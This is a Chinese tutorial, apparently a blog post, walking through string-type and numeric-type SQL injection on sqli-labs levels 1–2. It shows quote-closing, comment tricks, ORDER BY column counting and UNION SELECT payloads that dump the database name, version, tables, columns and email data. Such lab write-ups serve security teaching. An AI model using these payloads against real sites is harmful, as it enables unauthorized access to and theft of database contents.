SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2关)

最新推荐文章于 2026-05-21 18:58:45 发布

原创最新推荐文章于 2026-05-21 18:58:45 发布 · 6.7k 阅读

本内容遵循CC 4.0 BY-SA版权协议

本文详细介绍了SQL注入中的字符型和数字型注入原理、方法及步骤。字符型注入依赖于报错信息来构造payload，通过闭合查询语句和使用注释来获取数据。数字型注入则无需考虑单引号，直接利用数字进行注入。通过sqli-labs-master实验，展示了如何找到注入点、爆字段数和获取数据库信息。

字符型注入：

执行数据库查询，并在回显点展示。
用户可以看到数据库查询出错时的错误语句，就可以观察报错语句分析出查询语句结构，从而构造特殊的payload进行注入，并从回显点中获取想要的信息。
(与报错注入不同在拥有回显点，报错注入没有回显点需要通过错误信息查看结果)

根据报错的sql语句信息，查看sql语句样子，继而构造注入语句
构造单引号‘、双引号“、括号)闭合查询语句，直到报错证明注入点存在

地址栏输入#这类的要用16进制编码（网页传输方便的编码）
如：’#’ %23 注释
'- -'注释一般用- -+即- - 即- -%20
(空格) %20

（sqli-labs-master第一关演示）
找到注入点
单引号闭合,发生过报错—注入点存在，且观察报错语句是单引号闭合
在这里插入图片描述作为对比观察一下用双引号,没有任何报错信息

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$sql="SELECT * FROM users WHERE id='1' LIMIT 0,1";

$sql="SELECT * FROM users WHERE id='1'' LIMIT 0,1";

$sql="SELECT * FROM users WHERE id='1' #' LIMIT 0,1";

$sql="SELECT * FROM users WHERE id='1' #

$sql="SELECT * FROM users WHERE id='1' order by 3#

$sql="SELECT * FROM users WHERE id='' union select 1,2,3#

order by爆字段数
order by 3不报错证明有第三列

order by 4的时候报错，证明没有第四列

union select 1,2,3爆回显点
这里回显点为第2,3位
在这里插入图片描述

于是：

union select 1,database(),version()%23   # 通过回显点查询需要信息

在这里插入图片描述

' union select 1,group_concat(table_name),user() from information_schema.tables where table_schema = database() %23  # 查出表名

在这里插入图片描述

继续：

' union select 1,group_concat(column_name),user() from information_schema.columns where table_name = ‘emails’ %23

获取列名
在这里插入图片描述

继续获取到表内内容

' union select 1,2,group_concat(email_id) from emails --+

在这里插入图片描述成功获取到邮箱表内email_id列的内容

' union select 1,2,group_concat(id) from emails --+

同字符型注入

同字符型注入

sql语句不带’具体详见sql_lab less 1 和less 2 的区别，
因为数字可以不带’所以数字型报错注入的sql语句如：where id = 而不是where id =’’

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  # 数字

数字型注入不需要注释，也可以注释，因为注释只是为了注释掉我们闭合后剩余的’